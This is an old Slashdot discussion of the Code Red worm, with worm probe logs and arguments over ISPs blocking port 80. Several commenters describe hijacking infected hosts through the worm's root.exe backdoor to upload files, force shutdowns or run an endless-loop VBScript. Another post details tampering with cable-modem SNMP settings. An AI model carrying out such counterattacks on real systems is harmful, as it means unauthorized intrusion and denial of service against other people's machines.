&lt HTML&gt&lt HEAD &gt &lt META HTTP-EQUIV="REFRESH" CONTENT = "5; URL=http://www.microsoft.com/technet/treeview/defa ult.asp?url=/technet/itsolutions/security/topics/c odealrt.asp"&gt &lt/head&gt&lt body bgcolor="ffffff" text="ff0000"&gt &lt font size="+4"&gt &lt center &gt
YOUR SYSTEM IS INFECTED WITH CODE RED. GO AWAY NOW AND PATCH YOUR SYSTEM PLEASE.
&lt/center &gt &lt/font &gt &lt/body &gt &lt/html &gt

Re:Grrrrrr...

Wow, I didn't know automated worms had advanced to the point that THEY CAN READ!

Re:Grrrrrr...

I think his humor was the redirect to the MS site for getting patched against the virus. It (the redirect) won't help, but it won't hurt either.

someone should make a code red three

[vectus]

and copyright it. then, if anyone patches their computer to prevent it from being infected, the person who made the worm could invoke the DCMA, since they would be circumventing the virus. They could then sue microsoft, and the anti-virus companies, and every corporation running windows NT/2000.

It'd be a thing of beauty.

Re:My 'Data' Light has been going steady since Fri

[rjamestaylor]

a note to IIS users: /etc/httpd.conf it's not really that hard.

A note to Linux users: /etc/http.conf does not exist on Windows.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Wrong move

[SnapperHead]

Instead of blocking off port 80, why not explain to your customers that they need a REAL (secure) OS if they want to run webservers.

My local cable company out right hates me, becuase I run Linux. Well, I called them today about the severe speed decrease and they thanked me for not being one of the ones slowing down the entire network. Of course, they still don't like the fact that I am running a webserver. But, theres not much they can do about it. They didn't have a TOS when I signed up. So, I am grandfathered into running what ever I please. Keep in mind, I don't abuse this privilege. Which is why they don't make a big stick about it. I have a VERY low traffic site, which is mostly for my own private use.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Speaking of hotmail..

[kfuq]

I have gotten virus's in my winbox that both mcaffe and norton both didn't catch ..

Regarding its effect on laser printers.

[kaoshin]

I had read that it is supposed to hang Hewlett Packard laser printers with web interfaces. We had an issue today where a client's Minolta-QMS laser printer with a web interface was affected in the same manner.

Hasn't hit any of our servers but I keep getting the w32.sircam worm in my email all day. I reply to them all with easy to comprehend AOL language... "You've got worms."

New payload?

[geemon]

In looking at the web logs, has anyone seen a payload that consists of all A's instead of the X's or N's? In looking at some from a little earlier today I've seen some different requests in my log from the 10.1.*.* domain. They appear as follows...

10.1.*.* GET /Default.htm

always immediately followed by

10.1.*.* (same ip) GET /x.ida

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...A=X

Re:New payload?

If that is all that is after the A's, then it it will only crash vulnerable web servers -- no buffer overflow exploit.

Now that I think about it -- what an excellent way to stop them from scanning?

Seriously, if you are on a cable modem and are getting scanned from 10.x.x.x nets, then it is probably your cable provider looking for vulnerable servers.

Here's what AT&T (@home) says about it...

[bradleyjay]

I just got off IRC with what I thought was AT&T tech support. Turns out I'm not an AT&T customer anymore. Now I'm an @home customer. Well, actually my checks go to AT&T every month, but I don't have to abide by their AUP even though my official AT&T roadrunner homepage links to their AUP.

NOOOOOO! I'm bound to @home's AUP, which is on a completely different site. To their credit, the support staff was very polite and profesional. Anyway, here's my IRC logs, so you all can see what a joke MediaOne/AT&T/@home really is. I've changed their names to protect the innocent. "Tech" is the original level-1 tech i spoke to, and "Supervisor" is his supervisor.

Welcome moo2 ...
Connecting to server. Please wait...
Connected to athchat03.broadband.att.com
Tech has joined this session!
Tech says, Thank you for contacting AT&T Broadband Cable Internet Services. My name is Tech. How may I help you?
Tech says, You have blocked port 80, correct?
You say, can you pls unbloc port 80 for my IP?
You say, yes.
You say, i am fully patched against codered V1&v2
Tech says, Unfortunately, the port 80 has been blocked by the broadband engineers as to combat the spread of the code red virus. Sorry for any inconvenience.
You say, blocked for how long?
Tech says, That block will be removed by the broadband engineers when the issue with the virus on the network has been solved. There is no ETA given for that removal. Sorry.
You say, your aup says that if i chose to run an http server, i assume all security
risks.
You say, it does not say that you will block access even though i asert that i assume all risks.
Tech says, The actual use of a personal web server does violate the terms
and service agreement. We cannot individually remove the blocks for computers. Sorry for that.
You say, where in the aup does it say that?
Tech says, The use of a personal web server is against the terms of service agreement. It is one reason why we do not support Windows 2000 server and only Windows 2000 professional.
You say, according to your web site, section 9b says "If Customer chooses to run such applications, Customer should take the appropriate security measures"
You say, again, where in the aup does it say that?
Tech says, This information is recorded in our @home policies pages. I will see if I can get that information for you.
You say, pls do...if it differs from the aup posted on the website, there;s gonna be a problem.
Tech says, I will send you this page in one moment.
Tech pushes page, http://www.home.com/aup
You say, i am an att customer, not @home...if @home has dift policies than att,
it was up to them to inform me when the 2 merged. is i can talk to about this?
Tech says, I have inquired about your information. The block on port 80 will
not be lifted any time soon. If you wish to talk to a supervisor, I can arrange that for you.
You say, pls do...i was unaware that i am now an @home customer. while my home page has changed to excite@home, clicking on the 'member services' link or the 'help' link, the 2 places you'd expect to find an aup, i'm redirected back to at&t's site.
Tech says, I will need some information from you first.
Tech says, May I have your first and last name, and your current phone number with the area code please?
You say, xxxx xxxxxx xxx-xxx-xxxx
Tech says, May I also get your complete mailing address with the city, state and zip code please?
You say, 9999 nw 99 st. #999, anytown fl, 99999
Tech says, Thank you for that information. I will get a supervisor for you in one moment.
You say, thanks
Tech says, I am transferring you in one moment. The supervisor's name is
Supervisor.
You say, ok thanks tech
You are being transferred to another Agent. Please stand by...
Tech has left this session!
Supervisor has joined this session!
Supervisor says, Thank you for contacting AT&T Broadband Internet Services, I am a supervisor and my name is Supervisor, How can I help you today?
You say, did Tech explain the situation to you?
Supervisor says, Yes, your are requesting port 80 be unblocked?
You say, yes, pls
Supervisor says, That is not possible at this time I apologize.
You say, ok...i understand tat you are blocking to halt codered, which is acceptable since i'm not running any commercial site...
Supervisor says, Provision 10.9 on the user agreement is the section you
should refer too.
Supervisor says, That is correct.
You say, but i'd like to know why i'm being subjected to @home's aup when i'm an att customer
Supervisor says, Actually the section I quoted is on the Road Runner agreement.
You say, can you give me a url pls?
Supervisor says, @Home and ATRunner are in the process of merging.
You say, well according to the att aup, which is the only aup i'm bound to right now, "This Agreement represents the complete agreement concerning this license and may be amended only by a writing executed by both parties. "
You say, http://help.broadband.att.com/subagreelease.jsp 10.9
Supervisor says, Did you receive are email regarding the issue?
You say, srry, it's 11.9
You say, no
You say, the only email was about a rate increase
Supervisor says, One moment locating the link for your user agreement.
You say, thx
w-Supervisor pushes page, http://help.broadband.att.com/faq.jsp?
content_id=354&category_id=3
Supervisor says, You should have it in front of you right now.
Supervisor says, 10.9 is applicable in this instance.
You say, ok...understood...but you have to admit that it conflicts with http://help.
broadband.att.com/subagreelease.jsp 9b, which says in reference to http servers "If Customer chooses to run such applications, Customer should take the appropriate security..
You say, measures."
Supervisor says, That is correct. However you are former mediaone customer and our governed under the old agreement.
You say, the old agreement is the one you just sent me?
Supervisor says, Correct. That is the agreement you would have signed.
You say, i'll have to dig through my papers, but i doubt it.
You say, anyway, on a more friendly note, are the codered hits letting up at all yet?
Supervisor says, If you have any further questions please refer to AT&T Legal demands at http://help.broadband.att.com/legal regarding any challenges.
Supervisor says, Yes the implementation of the filters is causing it to let up.
Supervisor says, I apologize for us having to take the action we did.
You say, no, i mean inbound to your routers...
You say, we saw a drastic DECREASE at my work today..sounds like ppl are patching their systems.
Supervisor says, It was beginning to bring down the stability of our network and we had to take action.
Supervisor says, That may be the case or it may be the filters we put in place.
Supervisor says, I cannot say at this time.
Supervisor says, We are in the process of contacting the affected customers at this time.
You say, well thanks for the info...and i'm gonna do some more research. if i have any problems i'll refer to the last url you gave.
You say, is there a phone number for your legal dept?
Supervisor says, Your welcome. Legal Demands Center 183 Inverness Drive West Suite 100-N Englewood, Colorado 80112 Phone: 800-871-6298
You say, ok thanks again for the info, and thanks for being so professional about this matter.
You say, g'nite.
Supervisor says, It's been a pleasure chatting with you. Thank you for using AT&T Broadband Cable Internet Service and have a good day.
You say, you too.
The session has ended

Re:My 'Data' Light has been going steady since Fri

[XMyth]

Seems like you're implying that IIS costs money...which it does not. The OSes it runs on do however...that might have been what you were implying but it seemed otherwise to me.

Bring them to justice

[WildBeast]

Shouldn't we instead focus on finding the authors and bring them to justice.

Re:Bring them to justice

[szomb]

Is it illegal to write software like Code Red?

If one authors such a virus and simply puts the source on his/her web page with no precompiled binaries, and WITHOUT INFECTING ANY SYSTEMS HERSELF... are there legal sanctions?

Re:Bring them to justice

Maybe it's impossible to find the authors. What's plan B?

Re:Bring them to justice

[szomb]

How do you know the author of the virus is the person who spread it?

Like I said, if someone publishes the source code and lets someone else do the spreading, who's illegal? Both, the author, or the distributor?

Small util for Windows to listen on port 80?

[synthe]

Has anyone written a small little daemon that runs on win32 to listen to incoming requests on port 80 (or any configurable port) and just log the IP and string sent by the remote computer? I would like to have something like that to see how many times my windows box has been hit, even though its not vulnerable, and especially I'd love to install it on my work computer to see if code red is floating around the corporate network at all.

Re:Small util for Windows to listen on port 80?

[szomb]

You've heard of Perl, right?

Heck, netcat should work on Windows. See also CYGWIN.

Re:Small util for Windows to listen on port 80?

[strags]

Try this.

I just wrote it REALLY fast (which is why the code is so ugly), so I haven't tested it too thoroughly (ie. in the wild), but it looks like it oughta work.

Naturally, I expressly disclaim all responsibility for anything bad that happens should you choose to use this program.

Re:Small util for Windows to listen on port 80?

[gamorck]

Yeah I wrote something - its a set of scripts that work with IIS. I have a web app that will parse through IIS logs and dump a report back to you with a nice little graph.

I've developed a script - though its not fully functioning yet outside my test environment - that will detect a code red attack and immediately strike back by using root.exe to upload serveral files using tftp.

These files are used in an attempt to automatically patch the server and remove the security holes left by code red.

Unfortunately it has yet to actually succeed over the web. Most of the attackers seem to experience problems when it comes to shutting down. My defense routines automatically try two different ways of shutting down the remote machines (both of with work in my internal network between different machines) - but I cant quite get them to work on the machines on the web.

It may because of the increased security of NTFS. As my routines are only designed to work with security lax FAT formatted systems - that be part of it.

Anyway - Code Red is only getting worse. I've had over 2100 attack attempts since saturday. Day by day the daily number is increasing (600 today alone). This has got to stop....

Gam
"Flame at Will"

Re:Small util for Windows to listen on port 80?

Install a firewall like zonealarm, and you'll see the attempts to connect.

small survey

[1010011010]

I ran a test on the 1597 unique hosts that have attempted to infect my web server recently.

321- 20.1% - "Under Construction" default blank page
0- 00.0% - "too busy"
1093- 69.4% - cannot connect
183- 11.4% - some web page

filtering inbound http requests

[glob]

where i work we have to put iis boxes on the net. i don't like this, so i've written a program that runs on your firewall and filters inbound http requests.

"patching" all our iis boxes for codered took me approx 30 seconds :)

http://glob.com.au/http_filter/

freeware.

@home network busy spreading worm

[SirAnodos]

Here is a 20 minute segment from my router's logs:

-00:39:39 Unrecognized access from 24.252.126.24:4409 to TCP port 80
-00:36:36 Unrecognized access from 24.252.165.173:2976 to TCP port 80
-00:36:33 Unrecognized access from 24.252.165.173:2976 to TCP port 80
-00:36:27 Unrecognized access from 24.252.165.173:2976 to TCP port 80
-00:30:57 Unrecognized access from 24.252.222.104:3215 to TCP port 80
-00:30:55 Unrecognized access from 24.252.222.104:3215 to TCP port 80
-00:30:49 Unrecognized access from 24.252.222.104:3215 to TCP port 80
-00:25:34 Unrecognized access from 24.252.222.104:3822 to TCP port 80
-00:25:31 Unrecognized access from 24.252.222.104:3822 to TCP port 80
-00:25:25 Unrecognized access from 24.252.222.104:3822 to TCP port 80
-00:25:10 Unrecognized access from 24.94.116.61:2962 to TCP port 80
-00:25:07 Unrecognized access from 24.94.116.61:2962 to TCP port 80
-00:25:00 Unrecognized access from 24.94.116.61:2962 to TCP port 80
-00:22:50 Unrecognized access from 24.252.222.104:4245 to TCP port 80
-00:22:15 Unrecognized access from 24.252.16.129:1302 to TCP port 80
-00:22:12 Unrecognized access from 24.252.16.129:1302 to TCP port 80
-00:22:06 Unrecognized access from 24.252.16.129:1302 to TCP port 80
-00:19:14 Unrecognized access from 24.252.74.143:4835 to TCP port 80
-00:19:11 Unrecognized access from 24.252.74.143:4835 to TCP port 80
-00:19:05 Unrecognized access from 24.252.74.143:4835 to TCP port 80

This has been going on non stop since Sunday. 'nuf said.

My naive suggestion...

[Bigboote66]

Since Code Red's damage seems to be primarily a function of its ability to spread, why not treat it the way we attack some diseases/pests: destroy its ability to reproduce.

Why doesn't someone write a Code Red anti-worm - it spreads via the same mechanism as does Code Red, but once it has infected a machine, it uses its root privileges to close the door behind itself, then deletes itself. It could even send mail to the administrator of the machine indicating the fact.

-BbT

Who's going to own up to something like this?

[h0tb0x]

Surely the person who was savvy enough to write this understands the level of breach this is. To hijack probably more than a quarter million servers worldwide has got to be one heck of a jail sentence.

Microsoft is behind it

[pyite]

Warning: the following is all tongue and cheek. It's so obvious that Microsoft intentionally put this bug in and created Code Red themselves. By seeing how much the worm spread, they could see how many IIS machines were out there and there by discover how many copies of Windows have been pirated. And they thought they had us... hahaha

Pardon?

[CTboy]

I don't know if it works, I don't have a Win boxes to test it on...

I must have missed the sarcarism or humor there, or something.

The phrase, a Win boxes, is wrong under any variation of english grammar that I've ever seen. Though being the "grammar facist" maybe you know some grammar secret the rest of us dont? Please enlighten. Or maybe that was a poor attempt at sarcasim. I feel silly pointing out something so obvious.

Re:Pardon?

[grammar+fascist]

*laughs hysterically*

Okay, I think I've been missing out on too much sleep. You may dock my final score if you wish.

medium damage

[drew]

obviously it's classified as medium damage because it can only infect iis servers.

big whoop....

merchandising.

[saintlupus]

OpenBSD. AKA The Jimmy Hat OS.

i want the t-shirt. preferably with the blowfish trying to swim out the end of a trojan.

tee hee.

--saint

However, it it not remote root

[Oestergaard]

Slashdot is currently fucking up my submissions, claiming junk character posts, duplicate posts 22000 hours ago and what not. Sorry if this appears twice somewhere...

On to what I wanted to say:
While the executable is called root.exe, it's far from a remote root.

"Unfortunately" (well, if you want to do anything with root.exe at least), recent IIS versions are running as some IIS user with very few privileges. It did use to run as "system" (meaning - more power than the administrator), but it doesn't anymore.

My attempts at shutting down machines attacking my Apache box by running various "net stop" commands etc. were futile. The IIS user simply doesn't have the privileges to shut down the system.

I suspect one could create the equivalent of a fork bomb in a very minimal executable - then write the executable to the remote machine in a number of HTTP requests, and finally get the attacker to stop simply by executing the fork bomb.

But I haven't gotten around to trying this just yet :) Things would have been so much easier if this was indeede remote root.

Re:However, it it not remote root

[Oestergaard]

How about executing the following first:

echo "do while 1 = 1 loop" > do.vbs

and then executing do.vbs a very large number of times ?

Actually - I just executed it *ONCE* as normal user, and because VBScript runs in the scripting host I was unable to terminate the job myself.

Now, attempting to log in as administrator just hangs in the login dialog... Other sessions to the terminal server are still running normally.

Very interesting :)

Unfortunately VBScript does not allow for the creation of a fork bomb as I hoped - suggestions anyone ? The noble goal being to stop remote machines from attacking my poor Apache box by using their pre-installed root.exe "administration interface".

It is of course important that the administrative workaround for the broken boxes is not destructive. A reboot and hotfix must bring the box back to life - it's evil (although tempting at times) to break stuff beyond repair.

Useless use of cat

[winnetou]

You might have more chance to get hired if you changed
cat file | grep pattern
into
grep pattern file

Gee

Wow, those virus hasnt got to LDAP / Microsoft Active Directory and change people password yet.

Re:mediaone EUA ALLOWS FTP AND HTTP SERVERS

[NullPointer]

I sorta read that the same way, unfortunately it is contradicted by the AUP which says:

Examples of prohibited uses include, but are not limited to, running servers for mail, http, ftp, irc, and dhcp, and multi-user interactive forums.

Also, you'll find a Q&A that says:

AT&T Broadband does not allow servers to be connected to the cable modem. This means that no computer in a personal network can be used as a server.

They also say in their AUP that they don't spy on their customers and don't go out of their way to catch people. Essentially, if you're running a server that is *not* causing bandwidth problems for your neighbors, they won't come after you.

Cable modem MIBs

I've posted the MIBs here: http://a-docsis.tripod.com/

I had to modify them for my modem, as docsDev appears in the "experimental" group, rather than the proper location. Install all 4 files in your mibs directory, and you should be able to deal with any modem.

On my modem, the raw OID is ".1.3.6.1.3.83.1.6.4.1.2.1". The proper OID is ".1.3.6.1.2.1.69.1.6.4.1.2.1" (the last digit changes of course). If one doesn't work, try the other. From now on, I'll just post the OID that works for my modem, you may need to modify it.

The integer value ".1.3.6.1.3.83.1.6.3.0" controls the default action, with 2 being "accept". If your ISP was using a drop-by-default policy, removing the firewall rules would disable your internet connection (so snmpset it to "2" first). But I don't think any ISP firewalls that strictly.

The 1.3.6.1.3.83.1.2.1.[x].[rulenum] table controls SNMP access. If you know how to read an MIB, you can use this to change access settings (i.e. set community strings, or restrict by IP). To find your community strings, if they are not the default strings, you can download your modems config file through TFTP. Sniff some DHCP requests to find the server's address, and the filename. You might need to set your IP to one in the 10.x.x.x block while downloading the file (you can also get a copy of your modems firmware this way).

For anyone who thinks this info might help you uncap your modem - you're wrong. I've tried modifying every value related to speed limits, including adding new QOS tables. Nothing works (well, maybe if you hack the firmware, and convince your modem to take your "updated" version...). It's the most well-protected setting in the modem. However, you can READ the cap settings - so when you're ISP says "we're 100x faster than a 56k modem", you'll have proof they are lying. 2048 kbit isn't even 100x faster than a 28.8 modem...

You can also use MRTG to graph your modems bandwidth usage, which is pretty interesting. And you can graph things like the signal-to-noise ratio, transmit/receive power levels, error rates, etc.

Well

[savrinor]

I'm an @home user, and even though running servers is against the TOS for basic @home cable modem, I strongly oppose any measures at blocking port 80 outright. Why? Because I, like a number of people, am using tools to log the code red attempts that come into my machine, and I send my logs to DShield.org. This is important, I believe, for tracking the progress and severity of the worm.

As somebody suggested for Road Runner, the ISPs should scan for vulnerable IIS servers specifically, and block THEM. @Home certainly has the ability... My logs show dozens of scans and security checks by them every day, so a Code Red-oriented scan probably wouldn't be much more of a stretch for their security systems.

Just my 2 cents.

My solution to the remote root issue

[gamorck]

Actually the IIS Anonymous user (by default has guest access only) CAN shut down the machine. I've developed a script - though its not fully functioning yet outside my test environment - that will detect a code red attack and immediately strike back by using root.exe to upload serveral files using tftp.

These files are used in an attempt to automatically patch the server and remove the security holes left by code red.

Unfortunately it has yet to actually succeed over the web. Most of the attackers seem to experience problems when it comes to shutting down. My defense routines automatically try two different ways of shutting down the remote machines (both of with work in my internal network between different machines) - but I cant quite get them to work on the machines on the web.

It may because of the increased security of NTFS. As my routines are only designed to work with security lax FAT formatted systems - that be part of it.

Anyway - Code Red is only getting worse. I've had over 2100 attack attempts since saturday. Day by day the daily number is increasing (600 today alone). This has got to stop....

Gam
"Flame at Will"

My Solution

[gamorck]

Yeah I wrote something - its a set of scripts that work with IIS. I have a web app that will parse through IIS logs and dump a report back to you with a nice little graph.

I've developed a script - though its not fully functioning yet outside my test environment - that will detect a code red attack and immediately strike back by using root.exe to upload serveral files using tftp.

These files are used in an attempt to automatically patch the server and remove the security holes left by code red.

Unfortunately it has yet to actually succeed over the web. Most of the attackers seem to experience problems when it comes to shutting down. My defense routines automatically try two different ways of shutting down the remote machines (both of with work in my internal network between different machines) - but I cant quite get them to work on the machines on the web.

It may because of the increased security of NTFS. As my routines are only designed to work with security lax FAT formatted systems - that be part of it.

Anyway - Code Red is only getting worse. I've had over 2100 attack attempts since saturday. Day by day the daily number is increasing (600 today alone). This has got to stop.... and I do not believe it will until somebody writes a worm like code red that patches the servers instead of opening them up.

Gam
"Flame at Will"

MS Problems Cause Patch Failures

[SEWilco]

A recent issue of RISKS Digest pointed out that the site with the patch to fix this IIS problem has problems itself. FTP downloads of the patch are often being disconnected, resulting in receipt of only a partial patch file.

This partial patch file can be "run" without any error messages popping up, causing some admins to erroneously believe that they've applied a patch.

The only indication that something went wrong is if the window with file size is visible, and if the person doing the download notices that the amount of data is less than the size of the file to be downloaded.

Re:Well...

[RedX]

i had it run "start http://my.ip.address:666", and my firewall detected access from the infected IP, on port 666.. so it did open their browser.

Perhaps we can run this command to open the link to the IIS patch for these idiots. I couldn't fight the curiosity any longer, so I installed a webserver on my box just to watch the logs, and I've gotten well over 100 hits in the past hour and have found quite a few of my fellow RR members have been r00ted. Now if only I could figure out how to embed useful commands in the HTML so I can try to help some of these folks out.

That's Innovation!

You hadn't noticed that Microsoft innovated a whole virus industry? There are several companies which get a lot of money providing anti-virus solutions. Ever since the early days of MS-DOS, virus capabilities have been mandated in the DOS standard. That's innovation!

Lazy vs. Stupid

[Ratbert42]

Something's been bothering me about all the people criticizing the IIS admins for being too lazy to apply a month-old patch. Personally, I admin an IIS server that didn't have the patch applied, but Code Red didn't affect it. Why not? Because when I set up IIS in the first place I followed the security checklist. Unmapping .ida and other unused server extensions was right there on the list. Any decent Microsoft weenie should have done the same. If you're not stupid in the first place, sometimes you can get away with being lazy.

What a waste

[kahnmatt]

With all of the viruses going around, it makes me stop and wonder why there aren't more freeware projects going on. Obviously someone has the time and talent to write a decent program (a malicious program could just as easily be legitimate). And obviously, they've decided to give it away to the world for free. So where's my free FTP/SCP/Telnet/SSH/Web browser?!

Re:My 'Data' Light has been going steady since Fri

It does on mine.

Re:My 'Data' Light has been going steady since Fri

[cos(0)]

I did buy a full version of Windows 2000 Professional, because there are some Windows programs I like that aren't available on Linux/UNIX. Fortunately, I opted out of installing IIS -- the only Web server I run is Apache on my FreeBSD machine.

@home to cancel accounts of infected users

A friend of mine worked his way through online support for @home and managed to talk to a manager. Apparently, their plan is to axe the accounts of the infected users. "They aren't supposed to be running servers anyway". I can see them doing this if it goes on much longer. The HTTP hits are much less today on the 24.x.x.x.

"Advanced Network Security Training"

[Tony-A]

Hmmm, does the MSCE cover installing patches?
At least microsoft.com not mentions Code Red II on its home page. New variant. Download the patch now to protect your network.
Somehow I think I want to stay far, far away from .NET.

Yes, I know it's inelegant... but there's a reason

[BigBlockMopar]

You might have more chance to get hired if you changed
cat file | grep pattern
into
grep pattern file

[grin] That's actually what it's running; I'm not crazy and I don't want to melt down my server with the extra command and the pipe overhead. I took a little ...uhh... artistic license and used cat and then grep on the page because, based on the number of Slashdot visitors who are still running Windows, it seems more self-explanatory.

My reasoning? I don't know what percentage of those people are actually running Linux/UNIX servers. Most UNIX newbies could figure out what the cat does, and the pipe is the same as from DOS. And then, in that context, I don't think it would take a rocket scientist to see what grep does. However, grep on its own would look a little unclear.

My focus group was my two roommates, both reasonably conversant with Windows and DOS (one of them has an original copy of DOS 3.3 still sealed in the box), no previous experience with UNIX of any sort, or the allegedly mind-blowing command prompts. The closest they've ever come to a shell is configuring a POP mail client. [grin]

Yes, it appears to be inelegant. On one hand, the display version is in the very traditional UNIX model of a small, specialized and portable tool for each task, so in that sense, it's the preferable way, it's elegant in context. But, anyone who has ever written a script and watched top would cringe at it because it's a brute-force programming technique, almost as bad as a bubble sort. I don't claim to be a programmer, let alone an inspired one, but I certainly value efficiency.

Okay, am I out to lunch? Does it work? I thought it through; after all, this is a first impression of me. Maybe I'll put a link off it with an explanation of why I chose to display the command that way.

Code Red and Cable

[Vskye]

Right now I get hit about 40-70 times per hour with this. Thank god for Linux and iptables. :-) Funny thing is, most of the hits are from my cable providers network. Anyone want a retail box of NT 4.0 workstation? hehe...

AT&T Broadband in SERIOUS trouble.

[Fizzlewhiff]

I live in Jacksonville, FL and each night on the local news they report AT&T's customer service reports. The service (both cable and internet) is so bad the city even has a page to help people get their problems resolved.

Two weeks ago AT&T decided to drop the jacksonville.net domain we all use for our email. I complained about it and was told I should pay a business rate if I wanted a guaranteed email address. They've since turned the domain back on. It amazes me that AT&T lets their new aquisitions get away with such bad service.

On the bright side, this has allowed DSS retailers and DSL resellers to make a mint offering alternatives. In fact, AT&T has been hurt so bad they are fighting the city's requests to have access to their customer service reports. Now if they would only put the time they spend fighting city hall into fixing service problems...